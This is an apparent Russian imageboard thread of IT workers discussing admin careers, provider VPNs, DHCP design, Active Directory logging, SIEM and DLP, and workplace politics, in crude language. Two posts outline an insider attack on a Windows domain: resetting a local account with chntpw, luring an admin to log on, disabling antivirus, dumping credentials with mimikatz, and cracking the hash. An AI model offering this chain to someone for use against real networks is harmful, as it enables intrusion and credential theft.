Как бывший программист, ушедший в админство, могу сказать, что это всё заблуждения. 90% программистов - говнокодеры, которые 20% времени занимаются написанием небольших фич и 80% времени поиском багов в чужом коде. Короче, никакой светлой головы не нужно, если ты не краснодипломник ВМК МГУ, работающий звездой в области машинного обучения или биг дата... Но таких реально единицы и ты либо уже такой, либо таким тебе никогда не стать. Понимание этого к кому-то приходит через несколько лет, кому-то через десяток другой, а в итоге либо смиряешься, либо меняешь область деятельности на ту, в который ты можешь стать хоть чуть-чуть чем-то большим, чем просто мелкой шестеренкой на 100 строк кода в проекте, где этого кода миллионы строк...

>>63036
Поинтересуйся каких вакансий в гейропке больше, вот тебе и ответ. По Москве могу сказать, что вакансий сетевиков гораздо меньше, чем виндовз-админов, однако устроиться сетевиком проще. Во-первых, потому что среди вин-админов адская конкуренция, во-вторых, потому что под вин-админов попадают и многочисленные шива-вакансии. Вот только ccna, конечно, ни о чем, - это уровень техподдержки, для 60-100к тебе нужен уровень не ниже ccnp, можно без сертификатов.

>>63165
Ты ведь тот траль? Я тебе уже писал, что ты нихуя не разбираешься в IT, напишу еще раз:

>создание учеток в AD

Есть такая штука, как identity management системы - учетки новым сотрудникам сразу во всех нужных информационных системах создаются прямо в отделе кадров, при оформлении на работу...

>прописывание вланом на интерфейсах

В ЦОДах обычно интерфейсы в транках, а транк на вланы разбирает уже сам гипервизор. На доступе используют 802.1x - комп авторизуется по сертификату и радиус сервер на основе этой авторизации назначает порт в нужный влан. Технологии много лет уже, кстати, т.е. она и задолго до всяких SDN была.

>пердолинг iptables

Приличные NGFW фаерволы, вроде PaloAlto или Checkpoint давно уже (несколько лет как) динамически создают и применяют правила для сетевых сессий разных пользователей, т.е. узнают что трафик принадлежит Васе и применяют политику для всех групп, в которые Вася входит...

Да, такие штуки внедряют интеграторы, но вот эксплуатацией занимаются местные специалисты, т.к. если что-то, вдруг, упало, то реакция нужна немедленная, а никакой контракт с интегратором ее гарантировать не может. Если он вообще есть... потому что местных спецов держать дешевле.

15 янв, 08:49 593 1163174

>>63160

>Программист это работа, требующиая светлого ума. Те, кто может стать программистами, в админы не идут.

>создание учеток в AD

>прописывание вланом на интерфейсах

>пердолинг iptables

>>63412
https://serverfault.com/questions/331079/haproxy-and-forwarding-client-ip-address-to-servers

Ответы63176

15 янв, 08:58 594 1163176

>>63174

>Ты ведь тот траль? Я тебе уже писал, что ты нихуя не разбираешься в IT, напишу еще раз

Ты только что подтвердил то, что я написал выше.
Всё до простоты автоматизировано. И не требует глубокихъ знангий и вшемательства админа. И внедряется интеграторами. И динамически всё назначается и т.д. и.т.п.
Так получается, что админы УЖЕ нахрен не нужны. Взял макаку, которая по мануалам будет эксплуатировать весь парк и хватит. Если что - поможет интегратор.

Ответы63195

15 янв, 09:09 595 1163195

>>63176
Не, это ты снова подтверждаешь, что не имеешь никаких представлений о том как всё это на самом деле устроено, раз считаешь, что для обслуживания подобных информационных систем не нужны квалифицированные специалисты...

Ответы63200

15 янв, 09:16 596 1163200

>>63195

>информационных систем не нужны квалифицированные специалисты...

Нужны, но теперь вместо четырех сотрудников хватит одного-двух.

Ответы63204

15 янв, 09:31 597 1163204

>>63200
И снова ты не прав. Один админ в принципе быть не может, ведь он может уволиться/умереть/шантижировать с огромными потерями для бизнеса. Нужно минимум двое, но если один умер/уволился, то мы оказались в предыдущей ситуации... Т.е. нужно минимум 2-3 человека. При том 2-3 сетевика, 2-3 виндовс-админа, 2-3 человека, отвечающих за работу инфраструктуры (сети и системы хранения данных, блейд-сервера, виртуализация), дальше нужно 2-3 человека по каждой крупной информационной системе, базе данных... Не слабый такой штат уже выходит. И это уровень среднего бизнеса, в крупняке столько человек может в каждом региональном филиале сидеть!

Ну а в мелком бизнесе, где нет всех этих автоматизаций, как раз-таки и нужно много человек, чтобы делать рутинные операции, при том хоть кто-то из этих людей должен быть способен что-то внедрить - как-то ведь там та же адешечка появляется... и ведь не руками сисинтеграторов, услуги которых мелкому бизнесу явно не по карману.

15 янв, 09:56 598 1163207

Сетевики, два вопроса к вам:
1. На уровне ядра сети кроме RSTP и port-channel ещё что-то используется? или не
2. Как выглядит VPN от провайдера? Как выглядит он для сетевика, просто нешифрованный маршрут в сети провайдера, или нечто большее? Как он настраивается для сетевика, достаточно добавить ip route или надо ещё добавлять ipsec на интерфейс и всё шифровать? В чём плюсы в сравнении с обычным VPN

Ответы63211

15 янв, 10:13 599 1163211

>>63207
1. На ядре терминируются вланы, работает dhcp, может быть даже фильтрация. Ну и маршрутизация может быть, например, площадка в stub зоне, и эта зона на ядре крутится вместе с бэкбондом до роутера. Вообще понятие "ядра" весьма широкое - пара нексусов в ЦОДе тоже ядро, но там, куча совершенно других технологий и протоколов может применяться, например вместо port-channel будут VPC домены...

2. VPN от провайдера бывает L2 и L3. В обоих случаях твои езернет фреймы или ip пакеты гонятся через транспортную MPLS сеть провайдера, внутри его сети твой трафик изолирован от трафика других пользователей и интеренета. Отличие от VPN поверх интернета очевидно - в интернете твой трафик будет доступен всем узлам, через которые пройдет, плюс ты никогда не можешь предсказать что это будут за узлы. Т.е. в случае VPN от провайдера, не обязательно что-то шифровать, если доверяешь провайдеру, т.к. твой трафик будет доступен только ему одному.

Для сетевика настраивается всё очень просто - втыкаешь линки на двух площадках. Если это L2, то вешаешь серые адреса из одной подсетки и всё работает, как будто у тебя один большой сегмент сети. Если это L3, то у тебя будут Ip-адреса на интерфейсах до провайдера, т.е. чтобы связать две площадки придется сделать маршрутизацию, при этом, очевидно, ты уже не можешь использовать одинаковые подсетки с двух сторон. В случае vpn через инет, у тебя будет какой-нибудь gre тунель, т.е. тоже нужна будет маршрутизация.

Всякие ipsec во всех случаях вешаются поверх внешних интерфейсов и настраиваются политики, чтобы ipsec применялся только к нужному тебе трафику на этих интерфейсах. В случае vpn через инет можно применять ipsec только к трафику внутри GRE-туннеля, т.к. повесить ipsec на GRE-интерфейс.

Ответы63214

15 янв, 10:23 600 1163214

>>63211

>работает dhcp

Это да, забыл написать

>т.к. твой трафик будет доступен только ему одному.

А если провайдеров несколько, например в начале пути - это МГТС, а в втором офисе Билайн не говорим про всякие там провайдеры сотой мили

>Всякие ipsec во всех случаях вешаются поверх внешних интерфейсов и настраиваются политики, чтобы ipsec применялся только к нужному тебе трафику на этих интерфейсах

Это ясно дело

То есть провайдер может изолировать твой маркированный всякими VPLS/MPLS флагами трафик от остальной сети? Но при этом может тебя на хую покрутить, если ты его не зашифруешь?

Ответы63236

15 янв, 11:15 601 1163236

>>63214

>если провайдеров несколько

Тогда, скорее всего, они просто предоставляют тебе интернет, а не L3/L2 VPN. Да, бывает, что последнюю милю провайдер арендует у другого прова, но оборудование он всё равно ставит свое, конечно.

>провайдер может изолировать твой маркированный всякими VPLS/MPLS флагами трафик от остальной сети?

Провайдер заводит каждого клиента в свой VRF, внутри которого и MPLSит твои пакеты по своей сети, т.е. да они никогда не пересекутся с чужим трафиком, а если такое, вдруг, случится, скорее всего, у тебя где-то что-то упадет и ты напишешь провайдеру заявку, чтобы он это дело починил.

>Но при этом может тебя на хую покрутить, если ты его не зашифруешь?

Ты имеешь в виду проснифать твой трафик и украсть какую-нибудь внутреннюю инфу? Теоретически может. Практически ни один пров этим занимать не будет - если поймают, то прикроют сразу весь бизнес этого провайдера. Может ли он это по решению суда или запросу из ФСБ? Может и даже обязан будет... Может ли какой-нибудь один админ прова поиметь крупного клиента? Крайне маловероятно. Помимо доступов и навыков, нужно сделать так, чтобы никто ничего не заметил, плюс риски при поимке очевидно какие - в лучшем случае тюремный срок, в худшем, тебе устроят несчастный случай те, кого ты поломал (даже крупный бизнес у нас до сих пор по бандитским понятиям живет к сожалению). Не представляю, чтобы кто-нибудь на такое решился... Ну и служба безопасности проверяет людей, перед наймом, т.е. если у тебя родственники сидели или ты засветил свои сомнительные связи в прошлом (общался с теми, кто судим за IT-преступления, например), то тебя просто не возьмут на работу, чтобы не рисковать лишний раз. Олсо такие случаи мне известны - коллегу не взяли в крутое место, т.к. у его бати много лет назад была судимость за экономическое преступление какое-то...

Ответы63250

15 янв, 11:28 602 1163247

Кстати, вот зашла речь про dhcp, разжуйте как его правильно настраивать в не плоской сети, в которой куча вланов, и в которой несколько филиалов соединённых site-to-site vpn.

Ответы63251 63254 63271

15 янв, 11:36 603 1163250

>>63236

>чтобы он это дело починил.

У нас уже такое было, когда наш МТС завернул часть нашего трафика во внешний мир, но это было до того как я пришёл работать в это место, подробностей не знаю, знаю, что дело замяли выполненной заявкой о сломанном сервисе. У нас крупная антипутинская контора, ничего больше говорить не стоит, и есть вероятность, что нас прослушивало ФСБ

>крупный бизнес у нас до сих пор по бандитским понятиям живет к сожалению

Не знаю, но наш уже так не живёт, у нас не убивают и калечат, может где-то есть, но думаю, что крайне редко
А про приехать и ноги сломать - это российский менталитет, у нас так люди делают, вот ты машину мне запер, а я подожду и ноги тебе сломаю, наверное, для нашего бизнеса - это завести уголовное дело против кого-то, или сделать проверку, а там настоять на уголовном деле против сотрудника

>тебя просто не возьмут на работу, чтобы не рисковать лишний раз

Я знаю, я и есть СБ, мы не берём, ещё и на полиграф сажаем все ключевые позиции

я просто неплохой линуксойд и виндузятник, но плохой кисочник

Ответы63254

15 янв, 11:37 604 1163251

>>63247
https://www.youtube.com/watch?v=MoElaNJn-9w&t=352s

Держи, братишка

Ответы63252

15 янв, 11:42 605 1163252

>>63251
Норм, спасибо.

Остальные видосы на канале смотреть стоит? У меня некоторые пробелы по сетям.

Ответы63254

15 янв, 11:46 606 1163254

>>63247
Если несколько филиалов, с различающимися подсетями и маршрутизацией поверх vpn, то очевидно, что нужно делать локальный dhcp в каждом филиале. Если сеть уровня энтерпрайза, т.е. L2/L3 vpn и в КАЖДЫЙ филиал есть резервный канал, то тогда можно dhcp централизовать для удобства управления, а на самих площадках прописывать ip address-helper [shcp_server_ip] для проброса бродкаста на центральный dhcp.

>>63252
Стоит. Неплохой канал.

>>63250

>у нас не убивают и калечат, может где-то есть, но думаю, что крайне редко

Не знаю, насколько оно часто встречается, но точно встречается. Почти весь крупный бизнес в рашке в руках бывших бандитов, методы у них соответствующие.

>нас крупная антипутинская контора

Как там в штабе Навального?

Ответы63271

15 янв, 12:17 607 1163271

>>63254

>Как там в штабе Навального?

Хуёво, владелец конторы уже не в рахе, я думаю, что пора съёбывать, вот и почитываю про сиськи для общего развития

>>63254
>>63247

>то тогда можно dhcp централизовать для удобства управления

Хз, я бы так не стал делать, одна локация - один DHCP, только если это не совсем крошечный филиал на 1-2 ПК, да и те лучше настраивать хотя бы на роутер
А вообще ты должен помнить, что AD DS и авторизация без DNS не работает, поэтому DHCP это только одна из проблем.
Я делал так:
Если филиал на 3-5 ПК, то там стоял только роутер, хотя у меня всегда был обычный SSL_VPN, так как он больше нравится, так вот, там был роутер уровня микротика, и без l2/l3 от провайдера, да и провайдеров был вагон, так как где-то были только 4g без вариантов, а где-то лучшую цену давали МГТС, где-то местные крохи-провайдеры, там свой DHCP, DNS и домен в офисе, второй DNS от провайдера, если канал падал, то всё работало внутри сети, лимит стоял на 50 авторизаций без входа в домен, как правило это более чем хватало, так как больше чем пары часов канал не лежал, а 50 авторизаций тебе хватит чуть ли не на неделю без домена, а то и на месяц.
Если филиал был крупный, на компов 20+, тогда уже делал полноценный контроллер домена

У нас была строительная фирма, как правило мелкие объекты - стройки, там метами вообще приходилось ставить обычные ASUS RT-AC66u, так как на объекте 2 ноута и принтер, им кроме вайфая ничего и не нужно, и интернет, чтобы кино посмотреть, а было пару филиалов, с инженерами, там уже ставил второй контроллер домена. Хотя филиалы были мелкие до 30пк, с одним ВЛАНом на всё, без натива
Хотя тут сетивеки меня за анусы могут говном закидать, так как вланов в нём нету

Ты вообще можешь спрашивать

Ответы63287

15 янв, 12:38 608 1163287

>>63271
В целом верно всё говоришь. Другое дело, что у нас в энтерпрайзе другие масштабы. Есть только одна площадка всего с двумя вланами, где в одном висит сразу и принтер, и комп, а в другом IP-телефон. Но в целом мелкая для нас - это площадка не из одного человека, а пользователей на 20-50. Для такого количества никто не будет выделять стойку, ставить ИБП, локальные сервера с контроллером и т.п. Плюс если от ЦОДа площадка отвалится - информационная система всё равно работать не будет, а без этого бизнес практически встанет. Поэтому везде два канала, а локальные сервера есть только на очень крупных площадка на несколько сотен рабочих мест, как правило, там есть и локальные информационные системы, но всё равно 2-3 канала до ЦОДа... Там где нет второго канала L2 vpn - есть локальный инет и тунели до ЦОДа через него. Обычно на таких площадках инет еще используется для касс и эквайринга, чтобы оплату можно было принять в любом случае, т.е. даже если ЦОД упадет.

Что до авторизации в AD, то там таймаут и кэш по времени, а не по количеству авторизаций, вроде. Он по умолчанию что-то с неделю позволяет входить в комп без доступности контроллера...

>Ты вообще можешь спрашивать

Про что? Про Навального? Мне не очень интересно. Я не поддерживаю Путина и его политику, но и не вижу возможности поддержать кого-то другого. Тот же Навальный, очевидно, не сможет справиться с управлением страной - у него нет и никогда не было понимания как сделать из России процветающее государство. Хуже того, нет никакой уверенности, что у него вообще есть подобная цель...

Ответы63292

15 янв, 12:47 609 1163292

>>63287

> в AD, то там таймаут и кэш по времени

Точно, там 50 - это количество записей в кеше, уже и забывать стал

Я ставил домена ны 20-30 ПК только из-за интернета, так как из экономии не везде были резервы, кек, да и нагрузку снять на слабые 10-20мбит/сек каналы

Ответы63301

15 янв, 13:06 610 1163301

>>63292

>уже и забывать стал

Винда - это пиздец, если честно. Грузишься в кали, делаешь chntpw, чистишь кэш GPO, грузишься в винду без сети, делаешь закладку, которая позже позволит тебе расширить права до админских. Перезагружаешься уже с сетью, звонишь админу - дескать у тебя проблема какая-то серьезная, просишь его посмотреть. Он заходит на твой комп... Дальше повышаешь права до админских, убиваешь антивирус, запускаешь мимикац, получаешь пароль админа. Ну или хэш пароля, если винда новая. Тоже не плохо.

Ответы63304 63327 63365

15 янв, 13:09 611 1163304

>>63301
А что дальше с хэшем делать?

Ответы63316 66249

15 янв, 13:28 612 1163316

>>63304
Брутить по словарям, потом радужными таблицами. Обычно у админов в мелко-средне конторах пароли уровня Zm3ev1k, или !Comany123# т.е. пароли с низкой энтропией и брут вполне реален. А до выхода 8-ки так и вовсе прямо сам пароль в памяти висел. ХЗ когда попатчили это в 7-ке, но найти дырявую систему вполне реально. Вплоть до того, что можно ее поставить вручную и самому завести в домен - по умолчанию это любой пользователь может сделать...

Не знаю, есть ли здесь виндовс-админы, но если есть, пусть они сами расскажут как защищают свои адешки и защищают ли вообще. Я если что, сетевик и виндой уже очень давно не занимался, не уверен, как оно там сейчас всё.

15 янв, 14:01 613 1163327

>>63301
в большой компании ты будешь общаться с СБ уже где-то минут через 25

Ответы63328 63377

15 янв, 14:06 614 1163328

>>63327
Скажем так, в большой компании гораздо выше вероятность того, что такие действия вообще заметят, но насколько оперативно и заметят ли вообще - это большой вопрос. В ряде мест компы выпадающие из домена/касперского и пребывающие в таком состоянии по несколько дней - это норма... А на этапе внедрения новой площадки, вообще может черте что твориться, т.к. сроки все сорваны и нужно быстрее развернуться, а о безопасности начинают думать только после запуска объекта. Обе ситуации лично встречал.

Ответы63377

15 янв, 14:40 615 1163340

Короче, я проебал всё по собственной глупости и теперь сижу с дипломом токаря. Хочу сисадмином быть. Нравится ковыряться в компьютерах, освоил линукс, могу в виртуализацию через qemu/kvm.
Интересует вакансия помощника сисадмина(читай эникей). Что там вообще делать? Типа офисная тех.поддержка?
Пиздец, мне стыдно даже с моим дипломом на собеседование идти.
Подгорает ещё от того, что в повальном большинстве случаев, в компаниях используют парашный windows server, а я уже слишком привык к никсам.
Ну и собственно платиновые вопросы: что подучить? Что требуют на таких работах?

Ответы63354 63373 63384

15 янв, 14:58 616 1163354

>>63340
Нет никаких проблем, ищи работу по линуксам. Она есть её достаточно, на начальный уровень тоже.

Ответы63637

15 янв, 15:26 617 1163365

>>63301

>chntpw

Так-то да, можно хеш пароля с любого загрузятора вытащить, даже кали не нужен, при условии, что биёс не запаролен, а комп не опломбирован замком

Насколько я знаю фиксится обычный раздачей прав, так, что на одной локации в ГПО в локальные админы добавляется только конкретные УЗ, на другой другие, ясен хуй с домен админа никто не загружается, для каждого сервиса своя УЗ, ну то есть норма делать просто логин для сотрудника и отдельный для домен админа, а третий для энтерпрайз админа, и везде разные пароли, кек
Как итог одна УЗ локального админа может обслужить только 100-200 ПК максимум, и в целом не должна иметь больших прав, но зачастую, как мы все знаем, юзается локаладмин с паролем на уровне 87654321, который бесправный в домене, но зато все залиты с одного образа и одним паролем

По ИБ подразумевается, что ты не сможешь ничего загрузить, что может нарушить целостность шиндоус, из ОС тебе прав не хватит, а из EFI - БИОС, ну кек, короче, по поводу вытащить хард и унести отдельная тема, не будем её вскрывать эту тему

Ответы63916

15 янв, 15:35 618 1163373

>>63165

>Уже сейчас, полагаю, можео все это автоматизировать

Ну пиздуй, автоматизируй, хули ты.

>>63340

>Короче, я проебал всё по собственной глупости и теперь сижу с дипломом токаря

Диплом токаря это лучше чем ничего. А если ИТ заебёт можешь обратно станкам откатиться.

15 янв, 15:50 619 1163377

Забыл сказать
>>63327
тут ты прав>>63328, у нас так и есть, сидим в два ИБшника, на 6к людей, скорость реагирования низкая, ввели SIEM для собора и анализа логов, сейчас пытаемся внедрить машин лёрнинг для поиска отклонений, но сейчас по сути, если УЗ какого-то админа на локации будет найдена по радужной карте, то с огромной долей мы можем проебать это, реакция будет только на количество операций или очень специфичный евент, как 1102 (вроде такой у удаления журналов). У нас только 4624 - успешный вход, в сутки около миллиона событий, а на общем фоне мусорного доступа так вообще нереально разобраться, пока успешность внедрения машин лёрнинга на нуле. отсюда и появляются всякие делегирования прав и бесправность, сервисные УЗ под одну задачу и тп, по всяким там ПСИ ДСС или ИСО у 1 сотрудника должна быть персональная УЗ c доступом не больше 1 сервиса, так как 1 юзер может осуществлять не больше 1 роли администрирования, винда - виндузятнику, линукс - линуксойду, сеть - сетевику

Ответы63916

15 янв, 15:53 620 1163384

>>63165
Красавчик, ты отстал лет на 10, это всё уже есть, но админы придумывают новые вирусы и софт, чтобы их не увольняли

>>63340
У меня друг руководитель сетевиков в интеграторе, по образованию филолог, твой диплом никому не важен, важны только сертификаты, тебя разве, что в газпром не возьмут, там минимум МГУ

Ответы63916

15 янв, 16:17 621 1163412

>>61223
>>61258

БАМП вопросу, парни из энтерпрайза, неужели нет железячных решений или схемы?

Ответы63415 63967

15 янв, 16:21 622 1163415

15 янв, 19:52 623 1163637

>>63354
В ДС.

Ответы63659

15 янв, 20:19 624 1163659

>>63637
Да не правда, и не в ДС есть, по своему опыту знаю.

16 янв, 08:42 625 1163916

>>63384

>в газпром не возьмут, там минимум МГУ

Куча знакомых из МГУ и что-то никого их них не зовут в газпром. А вот в яндексы/авито зовут. Правда если ты с мехмата или вмк... В газпроме, скорее, связи важны, а за связями нужно куда-нибудь в плешку. Правда и оттуда у меня знакомый есть - работает аналитиком в самсунге, лол. Короче, корка почти ни на что не влияет. Разве что в гос структурах на высокие управляющие должности не возьмут.

>>63365

>одна УЗ локального админа может обслужить только 100-200 ПК максимум

Ну тут смотря что значит "обслуживать", у нас вот на 3к пользаков всего три виндовс-админа... Ясен хуй, на каждый комп с доменной учеткой они не ходят. А под какими учетками локально сидет - в душе не ебу, я ж не шпион...

>>63377
Да на самом деле нихера вы не сделаете. Единственный вариант - это агент на каждый комп, который отслеживает то, что реально нужно отслеживать и собирает в БД. А то ведь в домене невозможно даже определить какой пользователь в какие компы залогинен! Событий же входа/выхода и правда генерируется слишком много. Олсо для них вам не машинное обучение нужно, а какой-нибудь эластик серч и корреляционный анализ логов с самых разных источников, ведь одних контроллеров домена в сети может быть несколько десятков.

Ответы63922

16 янв, 09:28 626 1163922

80 Кб, 1259x687

13 Кб, 854x228

>>63916

>корка почти ни на что не влияет

Корка действительно может быть показателем знаний, я это понял только к 27 годам, когда приходят ребята из физтеха или мгупи и разница в их знаниях огромная, и первые умеют и жопу рвать, и осваивать новый материал, а вторые хотят только 9-18 и зп

>>63916

>Ну тут смотря что значит "обслуживать"

Домен одмен не будет логинется на юзер-пк, так как избыточность, на каждом ПК есть локальная группа Администраторы, куда по дефолту входят "домен одменс", но принято, через ГПО на определённую ОУ вешать группу юзеров, которая добавляется в локального админа каждой рабочей станции, чтобы эникей имел права Локального Одмена, но только в своей ОУ (локации обслуживания), и не более

>>63916

> то ведь в домене невозможно даже определить какой пользователь в какие компы залогинен!

Можно, на контроллерах эвент 4624, просто каждый успешный логин он генерирует 4624 с определённым type (SMB RDP и прочие), просто когда много людей, то эвентов, как я писал выше, слишком много

>>63916

>Единственный вариант - это агент на каждый комп, который отслеживает то, что реально нужно отслеживать и собирает в БД

Агенты и так есть, и это норма: ДЛП (может мониторить любой протокол передачи информации, SMB, RDP, Removable storage, https, ftp, всё, что хочешь), Антивирус (он может делать в буквальном смысле всё, даже блокировать файлы для пользователей по хешу, хотя всё от антивиря зависит, запрещать USB порты, определённые флешки с определённым ID, вообще все), есть всякие TimeInformer (почитай в гугле подробней, он мониторит каждый клик пользователя и делает скриншот), агентов много, просто они очень избыточны, и даже с тысячами фильтров дают овер событий, если событие чётко не определено (запуск вируса, копирования телефонных номеров, удаление журнала), то хуй его просто так отследишь
>>63916

>какой-нибудь эластик серч и корреляционный анализ логов с самых разных источников, ведь одних контроллеров домена в сети может быть несколько десятков

А у нас он и есть с платной подпиской на машин лёрнинг, у нас и есть десяток КД и десяток ДХЦП, плюс 4 эксчейнджа
Ещё раз, у нас такое количество событий, что чтобы подгрузить эвенты за сутки-двое надо потратить минут 5, при том, что эластик стоит на самых быстрых дисках в СХД, просто пиздец короче. Плюс, есть проблема с нагрузкой, у админов есть своя работа, и им нужно выполнять всякие скрипты и сценарии, от чего в кибане можно наблюдать пикрл, где сервисные УЗ выдают сотни тысяч эвентов каждый час, мы их не можем отследить глазами, для этого понадобиться отдельный человек, который сутками будет торговать лицом в события, поэтому и была предпринята попытка ввести машинлёнинг (2 пик без эвентов успешного логина 4624 и логофффа 4634, так как там просто пиздец будет, я даже запрос не смогу выполнить)

Короче, в плане ИБ большой продакшен полная пизда, так как на тебя начинают ссылаться если в отделе нету продаж, мол из-за блокировок ИБ, ойтишники постоянно пытаются сделать тебя крайним: "у юзера не работает скайп - виновто ИБ, не работает печать - ИБ", так как ИБ может блокировать приложения, а разобраться на месте никто не хочет. Приходится делать множество компромиссных решений, которые не секьюрны

16 янв, 09:28 626 1163922

80 Кб, 1259x687

13 Кб, 854x228

>>63916

>корка почти ни на что не влияет

>Ну тут смотря что значит "обслуживать"

> то ведь в домене невозможно даже определить какой пользователь в какие компы залогинен!

>Единственный вариант - это агент на каждый комп, который отслеживает то, что реально нужно отслеживать и собирает в БД

>какой-нибудь эластик серч и корреляционный анализ логов с самых разных источников, ведь одних контроллеров домена в сети может быть несколько десятков

Ответы63931

16 янв, 09:52 627 1163931

>>63922

>каждый успешный логин он генерирует 4624 с определённым type

Так это и есть самая большая архитектурная проблема винды. Нет простого способ включить, например, только отслеживание входов пользователей с ручным вводом пароля во всем домене. Отслеживаются сразу все входы (в т.ч. и автоматические логины учетных записей - компьютеров!) и в итоге тысячи событий, которые уже не несут никакой информации. Поэтому я и предложил поставить агента, который бы фиксировал только то, что реально важно.

>приходят ребята из физтеха или мгупи и разница в их знаниях огромная

Никто не спорит, что в физтехе/мгу подготовка потрясающая и без умения быстро и эффективно учиться в этим места не попасть, а если и попасть, то не окончить. А именно навык быстро учиться новому в IT самый востребованный. Но не стоит думать, что люди без образования или с дипломами всяких МИРЭА сильно хуже. Во-первых, среди них тоже хватает умных и эффективных, во-вторых, требующие 9-18 и ЗП - это рабочие лошадки, без которых тоже никуда.

>начинают ссылаться если в отделе нету продаж, мол из-за блокировок ИБ, ойтишники постоянно пытаются сделать тебя крайним: "у юзера не работает скайп - виновто ИБ, не работает печать - ИБ"

Надо тоже начать жаловаться на наших безопасников, а то они абсолютно всем(!) закрыли гмейл, вконтакт, ютуб и т.д. Спасибо за идею! Правда есть нюанс - у нас иерархия власти уродская. Начальник службы безопасности и IT-дир равны по рангу (формально) и выше них только директор компании - баба, которой похуй о чем там "мальчики" спорят, лол. При том эта баба бывшая любовница реального владельца бизнеса и всё о чем она думает - как бы ее саму не выпиздили, ведь в реальности все ключевые решения принимаются внешней управляющей компанией (ага мы часть огромного конгломерата). Ну и начальник службы безопасности там у них на мази по слухам (да и вся управляшка по ходу - это бывший криминал, силовики, экс чиновники и пр. воры в законы), а IT-дир нет - это приглашенный на время со стороны человек (и их у нас уже о-о-очень много разных было...). Короче, добро пожаловать, в пидорашка-энтерпрайз...

16 янв, 09:52 627 1163931

>>63922

>каждый успешный логин он генерирует 4624 с определённым type

>приходят ребята из физтеха или мгупи и разница в их знаниях огромная

>начинают ссылаться если в отделе нету продаж, мол из-за блокировок ИБ, ойтишники постоянно пытаются сделать тебя крайним: "у юзера не работает скайп - виновто ИБ, не работает печать - ИБ"

Ответы63944 63951 63956 67792

Ответы63938 63955

16 янв, 10:18 628 1163938

>>63931
Не, ввод с клавиатуры можно отследить, есть такой тип:
https://habrahabr.ru/company/netwrix/blog/148501/
2 — Интерактивный (вход с клавиатуры или экрана системы)
Но есть другой важный момент - юзеры не выключают ПК десятилетиями, а даже если за ПК садится кто-то другой, он может не разлогинить прошлого юзера, ну и тупой машинлёнинг в ЕЛК не умеет делать корреляцию на конкретные эвенты из коробки, а чтобы написать это руками в QUERY и DQL я слишком тупой, как и наши подрядчики, лол блджат

>>63931

>или с дипломами всяких МИРЭА сильно хуже

Я не думаю, я же пишу, что такой диплом менее показательный, да и вообще насколько я знаю МИРЭА и МГУПИ больше нету, сейчас это единый МТУ!
И ещё тупые HR-ы, ой бля, заёбывают почему у меня непристойный вуз, и не хочу ли я в 27 лет ещё получить диплом "хотя-бы бауманки", ебанутые мрази

У нас над всем ИТ и ИБ стоит "Бизнес", всем похуй на что там безопасно или нет, разве, что откровенно сливать нельзя
Человеку нужен вконтакт? - клиентам писать, ИБ не согласовало, значит упали продажи
Нужен ютуб? - ролики по продажам смотреть - ИБ виновато
Мы ввели единый гуглхром, к нам приходит один из директоров по продажам (их много), и говорит, что ему похуй на ИБ, и его сотрудникам нужен менеджер паролей как расширение в гугле, мы шлём нахуй, а он "продажи падают, так как пока сотрудник вводил пароль клиент развернулся и ушёл", вот так и живём. Здравого смысла почти нету
Человек судим за убийство и разбой - берём, он понравился на собеседовании ну это хоть 1 раз за год было, не больше

Всё хочу пидорнуть и уйти в интегратор или проломиться в нормальный крупный наебизнес, а вторая работа загрузила так, что вообще нету времени написать резюме и куда-то сходить,
надеюсь к февралю съебу

16 янв, 10:36 629 1163944

>пока сотрудник вводил пароль клиент развернулся и ушёл

Какие же продажники дегенераты, пиздец просто.

>Человек судим за убийство и разбой - берём, он понравился на собеседовании

И что? Ну он же не в розыске, честно отсидел лол.

>не хочу ли я в 27 лет ещё получить диплом "хотя-бы бауманки"

Бомбануло.

Ответы63949 63951

4 Кб, 212x249

16 янв, 10:44 630 1163949

>>63944
Сам бомблю, братишка, сам бомблю

Ответы63956

16 янв, 10:50 631 1163951

>юзеры не выключают ПК десятилетиями

Принудительную блокировку экрана сделать через 30 минут и автоматическую перезагрузку в ночь с субботы на воскресенье для установки обновлений.

>У нас над всем ИТ и ИБ стоит "Бизнес"

ХЗ как у вас там на самом деле, но в бизнес над всем не верю. Или ты KPI имел в виду? Потому что KPI и у нас тоже все выполняют и перевыполняют, лол...

>хочу пидорнуть и уйти в интегратор или проломиться в нормальный крупный наебизнес

Тоже рад бы уйти куда-нибудь, но жизненный опыт подсказывает, что везде будет примерно тоже самое, на разве что офис получше/похуже и зарплата побольше/поменьше.

>>63944

>честно отсидел

Суть в том, что он не просто "понравился" - он явно чей-то протеже, при том кого-то, кто сильно выше службы безопасности стоит. Подумай сам, ведь никто с судимостью тебя даже на собеседование не позовет...

Ответы63954 63955

4 Кб, 212x249

16 янв, 10:56 632 1163954

>>63951
Не, я тебе всё описал как есть, именно так, не KPI, а именно продажи, всё делается для эффективности продаж. Хоть ДЛП внедрили, так как стали слишком много клиентов пиздить, а теперь цифровая утечка перекрыта, только пизди сам хард с пк или фоткай экран.

16 янв, 10:59 633 1163955

>>63931

>Начальник службы безопасности и IT-дир равны по рангу

В принципе, так и надо. Все, что написано дальше, очень хуёво, конечно.
>>63951

>автоматическую перезагрузку в ночь с субботы на воскресенье

И в это время тоже какая-нибудь сволочь может "работать".
Как вариант VDA и desktop on demand подошло бы, но, опять же,
1) мало ли, почему

>юзеры не выключают ПК десятилетиями,

может, там ДОКУМЕНТЫ ВАЖНЫЕ ОТКРЫТЫ;
2) в филиале в ебенях десктоп из головного ДЦ будет полдня грузиться;
3) ну и дорого плюс ёбнутое лицензирование.

Ответы63973

16 янв, 10:59 634 1163956

>МИРЭА

Лол, меня хотели туда запихнуть в нулевых, ездил туда на подготовительные занятия - освещение хуёвое, отопления нет, в аудиториях все в куртках занятия говно - ну я и забил хуй и поступил в соседний МИТХТ - откуда вылетел на 4 курсе, потому что тоже говно ебаное - а сам МИТХТ внезапно объединился с МИРЭА в некий МТУ - представляю какая это шарага.

>>63949

>Сам бомблю, братишка, сам бомблю

Да у меня вообще с государственными учебными заведениями довольно хуёво складывается. Хорошо хоть вернулся в ВУЗ после армейки и, пересилив себя, таки осилил высшее образование. Но больше в ВУЗы эти сраные не ногой.

Зато в том году отучился в "Специалисте" на сетевика и ещё по программе внедрения бесконтактной идентификации в учреждениях культуры - вот это всё реально доставило. Чай, не рашкоВУЗы.

Ответы63958 63973

16 янв, 11:04 635 1163958

>>63956

>в некий МТУ - представляю какая это шарага.

